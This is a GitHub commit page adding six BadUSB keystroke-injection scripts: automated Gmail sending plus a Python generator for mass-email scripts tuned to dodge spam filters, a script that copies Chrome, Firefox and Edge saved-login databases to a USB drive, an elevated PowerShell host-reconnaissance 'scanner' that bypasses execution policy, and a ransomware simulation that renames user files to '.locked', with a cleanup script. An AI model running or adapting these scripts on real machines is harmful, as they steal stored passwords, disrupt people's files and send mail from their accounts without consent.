Merge pull request #591 from MarkCyber/main

More BadUSB Scripts
This commit is contained in:
UberGuidoZ 2024-05-29 14:21:25 -07:00 committed by GitHub
commit 86de7d9a9b
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
6 changed files with 980 additions and 0 deletions

View File

@ -0,0 +1,42 @@
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%
REM %%%%%%%%%%%% This script is intended to send an email via badUSB (into your logged in gmail on chrome) %%%%%%%%%%%%
REM %%%%%%%%%%%% This script will open chrome, send an email, and then close chrome. Must be logged in to email %%%%%%%%%%%%
REM %%%%%%%%%%%% You can use python to replicate this script by changing email addresses & name every time %%%%%%%%%%%%
REM %%%%%%%%%%%% The python script in section 2.1 generates badusb scripts for multiple emails if need be %%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
DELAY 1000
GUI r
DELAY 500
STRING chrome
ENTER
DELAY 1000
STRING https://mail.google.com/mail/u/0/#inbox?compose=new
ENTER
DELAY 5000
DELAY 1000
STRING {EMAIL ADDRESS YOU WANT TO SEND EMAIL TO}
DELAY 500
TAB
TAB
STRING {YOUR SUBJECT NAME}
TAB
STRING Hi {THEIR NAME}
ENTER
ENTER
STRING {CONTENTS OF THE EMAIL}
ENTER
ENTER
STRING {IF YOU WANT A SECOND PARAGRAPH, THIS IS WHAT DOUBLE-ENTER ABOVE DOES}
ENTER
ENTER
STRING Respectfully,
ENTER
ENTER
STRING {YOUR NAME}
ENTER
CTRL ENTER
DELAY 5000
DELAY 1000
ALT F4
REM check out github.com/markcyber for more scripts

View File

@ -0,0 +1,101 @@
#######################################################################################################################################
#######################################################################################################################################
################# This script was created by github.com/MarkCyber (w/ assistance of ai) ####################
################# This is a python script to automatically create BadUSB scripts to auto send emails ####################
################# This takes a excel sheet with the columns named "Names" and "Emails" ####################
################# This script will then make a badusb script using the name + email of each person ####################
################# There are various subject options that will be chosen from, to minimize "spam" ####################
################# Change the signature to your name, and put subject options that fit your email ####################
################# Lastly, of course make sure to change the contents of the email to what you want ####################
#######################################################################################################################################
#######################################################################################################################################
import pandas as pd
import random
# Load the Excel file, make sure it has the same name (or change the name in this script)
file_path = 'NameAndEmails.xlsx'
data_df = pd.read_excel(file_path)
# Your excel should have 2 columns. Names, and Emails.
data_cleaned_df = data_df[['Names', 'Emails']].dropna().reset_index(drop=True)
data_cleaned_df.columns = ['Name', 'Email']
# List of placeholder subject options. Change these to 7 similar subjects that match your email (if you are sending many. You can use the same if not)
subject_options = [
"Placeholder for subject option 1",
"Placeholder for subject option 2",
"Placeholder for subject option 3",
"Placeholder for subject option 4",
"Placeholder for subject option 5",
"Placeholder for subject option 6",
"Placeholder for subject option 7"
]
# Placeholder for email body template. The name field will be filled from the "names" section in the excel sheet you provided.
# Just modify the actual email body and sender name to fit your needs
email_body_template = """
Hi {name},
Placeholder for email body.
Warm Regards,
Sender Name
"""
# Function to generate BadUSB script
def generate_badusb_script_with_placeholders_single_file(data_df):
script_template = [
"DELAY 1000",
"GUI r",
"DELAY 500",
"STRING chrome",
"ENTER",
"DELAY 1000",
"STRING https://mail.google.com/mail/u/0/#inbox?compose=new", # In chrome it opens gmail to compose an email. This is why you must be logged in.
"ENTER",
"DELAY 5000"
]
scripts = script_template
for index, row in data_df.iterrows():
name = row['Name']
email = row['Email']
subject = random.choice(subject_options)
random_delay = random.randint(10000, 25000)
email_body_lines = email_body_template.format(name=name).strip().split('\n')
email_body_lines = [f"STRING {line.strip()}" for line in email_body_lines if line.strip()]
email_script = [
"DELAY 1000",
f"STRING {email}",
"DELAY 500",
"TAB",
"TAB",
f"STRING {subject}",
"TAB"
] + email_body_lines + [
"ENTER",
"CONTROL ENTER",
"DELAY 5000",
f"DELAY {random_delay}", #random delay so emails are not sent at the sames, ideally minimizing the potential to be marked as spam
"ALT F4"
]
scripts += email_script
return "\n".join(scripts)
# Generate the BadUSB script with placeholders and proper send command in a single file
final_script_with_placeholders = generate_badusb_script_with_placeholders_single_file(data_cleaned_df)
# Save the script to a file
final_script_file_path = 'final_script_with_placeholders.txt' #This would be your badusb script
with open(final_script_file_path, 'w') as file:
file.write(final_script_with_placeholders)
print(f"Script saved to {final_script_file_path}")
#check out github.com/markcyber for more badusb / pen testing / automation tools and scripts

View File

@ -0,0 +1,54 @@
REM ##################################################################################################################
REM ############## This script was created by github.com/markcyber ##############
REM ############## This script requires a secondary USB named "MYUSB" to save credentials to ##############
REM ############## The extracted data will require decryption ##############
REM ##################################################################################################################
REM Open PowerShell
DELAY 1000
GUI r
DELAY 500
STRING powershell
DELAY 500
ENTER
DELAY 1000
REM Check if the USB drive exists
STRING $usbDrive = Get-WmiObject Win32_Volume | ? { $_.Label -eq 'MYUSB' } | Select -ExpandProperty DriveLetter;
STRING if ($usbDrive -ne $null) {
ENTER
DELAY 500
STRING cd $usbDrive;
ENTER
DELAY 500
STRING mkdir BrowserData;
ENTER
DELAY 500
STRING cd BrowserData;
ENTER
DELAY 500
REM Copy Chrome Login Data to USB
STRING $chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data";
STRING if (Test-Path $chromePath) { Copy-Item $chromePath "$usbDrive\BrowserData\ChromeLoginData"; }
ENTER
DELAY 500
REM Copy Firefox Login Data to USB
STRING $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\";
STRING if (Test-Path $firefoxPath) { Copy-Item $firefoxPath -Recurse "$usbDrive\BrowserData\FirefoxData"; }
ENTER
DELAY 500
REM Copy Edge Login Data to USB
STRING $edgePath = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data";
STRING if (Test-Path $edgePath) { Copy-Item $edgePath "$usbDrive\BrowserData\EdgeLoginData"; }
ENTER
DELAY 500
STRING }
ENTER
DELAY 500
REM Clear the clipboard to remove any sensitive data (This is not necessary, unless you did something on target PC)
STRING echo off | clip
ENTER
DELAY 500
REM Close PowerShell
STRING exit
ENTER
DELAY 500
REM Check out Github.com/MarkCyber for more badusb scripts and other hacky stuff

View File

@ -0,0 +1,630 @@
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%%%
REM %%%%%%%%%%%%% This script acts as a plug-in vulnerability scanner. Only use with permission %%%%%%%%%%%%%%
REM %%%%%%%%%%%%% This will require a secondary USB named as "MYUSB" to save all information onto %%%%%%%%%%%%%%
REM %%%%%%%%%%%%% This will find information on the following and save results in a results.txt file %%%%%%%%%%%%%%
REM %%%%%%%%%%%%% Info on: password policy, audit services, network settings, softwares and versions, CVEs %%%%%%%%%%%%%%
REM %%%%%%%%%%%%% Info on: open ports, firewall status, antivirus status, smbv1 status, missing updates & more %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
DELAY 1000
REM Open Start Menu
CONTROL ESCAPE
DELAY 2000
STRING powershell
REM Navigate to the context menu to run PowerShell as an administrator
DELAY 500
RIGHTARROW
DELAY 100
DOWNARROW
DELAY 100
ENTER
DELAY 3000
ALT Y
DELAY 5000
REM Set PowerShell Execution Policy to Bypass
DELAY 1000
STRING set-executionpolicy bypass -scope process -force
DELAY 200
ENTER
DELAY 200
REM Create the PowerShell script in memory and execute it
DELAY 200
STRING $usbName = "MYUSB"
DELAY 200
ENTER
DELAY 200
STRING $usbDrive = Get-WmiObject Win32_Volume | Where-Object { $_.Label -eq $usbName } | Select-Object -ExpandProperty DriveLetter
DELAY 200
ENTER
DELAY 200
STRING if ($usbDrive) {
DELAY 200
ENTER
DELAY 200
STRING $owner = (Get-WmiObject Win32_ComputerSystem).UserName
DELAY 200
ENTER
DELAY 200
STRING $directoryPath = Join-Path -Path $usbDrive -ChildPath $owner
DELAY 200
ENTER
DELAY 200
STRING New-Item -ItemType Directory -Path $directoryPath
DELAY 200
ENTER
DELAY 200
STRING $resultsFilePath = Join-Path -Path $directoryPath -ChildPath "results.txt"
DELAY 200
ENTER
DELAY 200
STRING "" > $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING function check-passwordpolicy {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING net accounts
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking password policy: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function audit-services {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING get-service | select-object name, displayname, status, starttype
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error auditing services: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-networksettings {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING get-netipconfiguration
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking network settings: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-softwarevulnerabilities {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING get-itemproperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | select-object displayname, displayversion, publisher
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking software vulnerabilities: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-cve {
DELAY 200
ENTER
DELAY 200
STRING param (
DELAY 200
ENTER
DELAY 200
STRING [string]$productname,
DELAY 200
ENTER
DELAY 200
STRING [string]$version
DELAY 200
ENTER
DELAY 200
STRING )
DELAY 200
ENTER
DELAY 200
STRING $initialDelay = 2
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING $uri = "https://services.nvd.nist.gov/rest/json/cves/1.0?keyword=$productname+$version"
DELAY 200
ENTER
DELAY 200
STRING start-sleep -seconds $initialDelay
DELAY 200
ENTER
DELAY 200
STRING $response = invoke-restmethod -uri $uri -method get
DELAY 200
ENTER
DELAY 200
STRING if ($response.totalresults -gt 0) {
DELAY 200
ENTER
DELAY 200
STRING foreach ($cve in $response.result.cve_items) {
DELAY 200
ENTER
DELAY 200
STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING } else {
DELAY 200
ENTER
DELAY 200
STRING "no cves found for $productname $version"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking CVEs: $_"
DELAY 200
ENTER
DELAY 200
STRING if ($_.Exception -match '403') {
DELAY 200
ENTER
DELAY 200
STRING write-output "403 Forbidden error encountered. Retrying in 60 seconds..."
DELAY 200
ENTER
DELAY 200
STRING start-sleep -seconds 60
DELAY 200
ENTER
DELAY 200
STRING $retryResponse = invoke-restmethod -uri $uri -method get
DELAY 200
ENTER
DELAY 200
STRING if ($retryResponse.totalresults -gt 0) {
DELAY 200
ENTER
DELAY 200
STRING foreach ($cve in $retryResponse.result.cve_items) {
DELAY 200
ENTER
DELAY 200
STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING } else {
DELAY 200
ENTER
DELAY 200
STRING "no cves found for $productname $version"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function analyze-logs {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING get-eventlog -logname system -newest 100
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error analyzing logs: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-openports {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING netstat -an
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking open ports: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-missingupdates {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING write-output "Checking Windows Update logs..."
DELAY 200
ENTER
DELAY 200
STRING $updateLogPath = Join-Path -Path $directoryPath -ChildPath "WindowsUpdate.log"
DELAY 200
ENTER
DELAY 200
STRING Get-WindowsUpdateLog -LogPath $updateLogPath
DELAY 200
ENTER
DELAY 200
STRING write-output "WindowsUpdate.log written to $updateLogPath"
DELAY 200
ENTER
DELAY 200
STRING Remove-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Temp\WindowsUpdateLog\*" -Recurse -Force
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error getting Windows Update log: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-firewallstatus {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING netsh advfirewall show allprofiles
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking firewall status: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-smbv1status {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING get-windowsoptionalfeature -online -featurename smb1protocol
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking SMBv1 status: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-antivirusstatus {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING get-mpcomputerstatus
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking antivirus status: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING check-passwordpolicy >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING audit-services >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING check-networksettings >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING check-softwarevulnerabilities >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING analyze-logs >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING check-openports >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING check-missingupdates >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING check-firewallstatus >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING check-smbv1status >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING check-antivirusstatus >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
REM Dynamically identify critical software from running processes and scheduled tasks
STRING $runningSoftware = Get-Process | Select-Object Name | Sort-Object Name -Unique
DELAY 200
ENTER
DELAY 200
STRING $scheduledTasks = schtasks /query /fo CSV | ConvertFrom-Csv | Select-Object TaskName, TaskToRun | Sort-Object TaskToRun -Unique
DELAY 200
ENTER
DELAY 200
REM Combine running software and scheduled tasks
STRING $softwareList = @()
DELAY 200
ENTER
DELAY 200
STRING foreach ($process in $runningSoftware) {
DELAY 200
ENTER
DELAY 200
STRING $softwareList += $process.Name
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING foreach ($task in $scheduledTasks) {
DELAY 200
ENTER
DELAY 200
STRING $softwareList += [System.IO.Path]::GetFileNameWithoutExtension($task.TaskToRun)
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
REM Remove duplicates and empty entries
STRING $softwareList = $softwareList | Sort-Object -Unique | Where-Object { $_ -ne "" }
DELAY 200
ENTER
DELAY 200
REM Check CVEs for identified software
STRING foreach ($software in $softwareList) {
DELAY 200
ENTER
DELAY 200
STRING $version = (Get-ItemProperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | Where-Object { $_.DisplayName -eq $software }).DisplayVersion
DELAY 200
ENTER
DELAY 200
STRING if ($version) {
DELAY 200
ENTER
DELAY 200
STRING check-cve -productname $software -version $version >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING $initialDelay += (Get-Random -Minimum 5 -Maximum 10)
DELAY 200
ENTER
DELAY 200
STRING start-sleep -seconds $initialDelay
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING write-output "Results saved to USB drive."
DELAY 200
ENTER
DELAY 200
STRING } else {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error: USB drive MYUSB not found."
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING invoke-command -scriptblock $script
DELAY 200
ENTER
DELAY 20000
REM check out github.com/markcyber for more badusb/pen testing scripts and tools

View File

@ -0,0 +1,91 @@
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%%%
REM %%%%%%%%%%%%% This script simulates a ransomware attack by changing file extensions and displays a message %%%%%%%%%%%%%%
REM %%%%%%%%%%%%% Renaming file extensions renders each file unusable until the proper extension is added %%%%%%%%%%%%%%
REM %%%%%%%%%%%%% Run (1.1)RansomwareSimulationCleanup to revert the changes and renaming of extensions %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
DELAY 1000
GUI r
DELAY 1000
REM opens powershell (this is for windows machines)
STRING powershell
ENTER
DELAY 3000
REM Define the locations using correct SpecialFolder enumerations
STRING $folders = @(
DELAY 500
ENTER
DELAY 500
STRING [System.Environment+SpecialFolder]::Desktop,
DELAY 500
ENTER
DELAY 500
STRING [System.Environment+SpecialFolder]::MyPictures,
DELAY 500
ENTER
DELAY 500
STRING [System.Environment+SpecialFolder]::MyMusic,
DELAY 500
ENTER
DELAY 500
STRING [System.Environment+SpecialFolder]::Downloads
DELAY 500
ENTER
DELAY 500
STRING )
DELAY 500
ENTER
DELAY 500
REM Iterate over each location
STRING foreach ($folder in $folders) {
DELAY 500
ENTER
DELAY 500
STRING $path = [Environment]::GetFolderPath($folder)
DELAY 500
ENTER
DELAY 500
REM Get all files in the path and rename them
STRING Get-ChildItem -Path $path -File | ForEach-Object { Rename-Item -Path $_.FullName -NewName ($_.Name + '.locked') }
DELAY 500
ENTER
DELAY 500
STRING }
DELAY 500
ENTER
DELAY 2000
REM Display ransomware message
STRING Add-Type -AssemblyName PresentationFramework
DELAY 500
ENTER
DELAY 500
STRING $Window = New-Object System.Windows.Window
DELAY 500
ENTER
DELAY 500
STRING $Window.WindowStartupLocation = 'CenterScreen'
DELAY 500
ENTER
DELAY 500
STRING $Window.WindowState = 'Maximized'
DELAY 500
ENTER
DELAY 500
STRING $Window.Topmost = $true
DELAY 500
ENTER
DELAY 500
STRING $Window.Content = 'Your files have been encrypted. This is a simulation. Please contact your IT support team.'
DELAY 500
ENTER
DELAY 500
STRING $Window.ShowDialog()
DELAY 500
ENTER
DELAY 2000
STRING exit
DELAY 500
ENTER
REM check out my github at github.com/markcyber for more badusb & hacking type tools

View File

@ -0,0 +1,62 @@
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%%%
REM %%%%%%%%%%%%% This is a follow-up script to the RansomwareSimulation %%%%%%%%%%%%%%
REM %%%%%%%%%%%%% Running this renames all extensions back to their original, full path- making them usable %%%%%%%%%%%%%%
REM %%%%%%%%%%%%% This can be ran multiple times if necessary %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
DELAY 1000
GUI r
DELAY 2000
STRING powershell
ENTER
REM increased delays to make sure each command can go through even on slower computers
DELAY 6000
REM Define the locations using correct SpecialFolder enumerations
STRING $folders = @(
DELAY 1000
ENTER
DELAY 1000
STRING [System.Environment+SpecialFolder]::Desktop,
DELAY 1000
ENTER
DELAY 2000
STRING [System.Environment+SpecialFolder]::MyPictures,
DELAY 1000
ENTER
DELAY 2000
STRING [System.Environment+SpecialFolder]::MyMusic,
DELAY 1000
ENTER
DELAY 2000
STRING [System.Environment+SpecialFolder]::Downloads
DELAY 1000
ENTER
DELAY 2000
STRING )
DELAY 1000
ENTER
DELAY 3000
REM Iterate over each location
STRING foreach ($folder in $folders) {
DELAY 1000
ENTER
DELAY 1000
STRING $path = [Environment]::GetFolderPath($folder)
DELAY 1000
ENTER
DELAY 4000
REM Get all .locked files in the path and rename them back
STRING Get-ChildItem -Path $path -File | Where-Object { $_.Name.EndsWith('.locked') } | ForEach-Object { Rename-Item -Path $_.FullName -NewName ($_.Name -replace '\.locked$', '') }
DELAY 2000
ENTER
DELAY 5000
STRING }
DELAY 1000
ENTER
DELAY 4000
STRING exit
DELAY 1000
ENTER
REM Check out github.com/MarkCyber for more badusb scripts, malware and pen testing stuff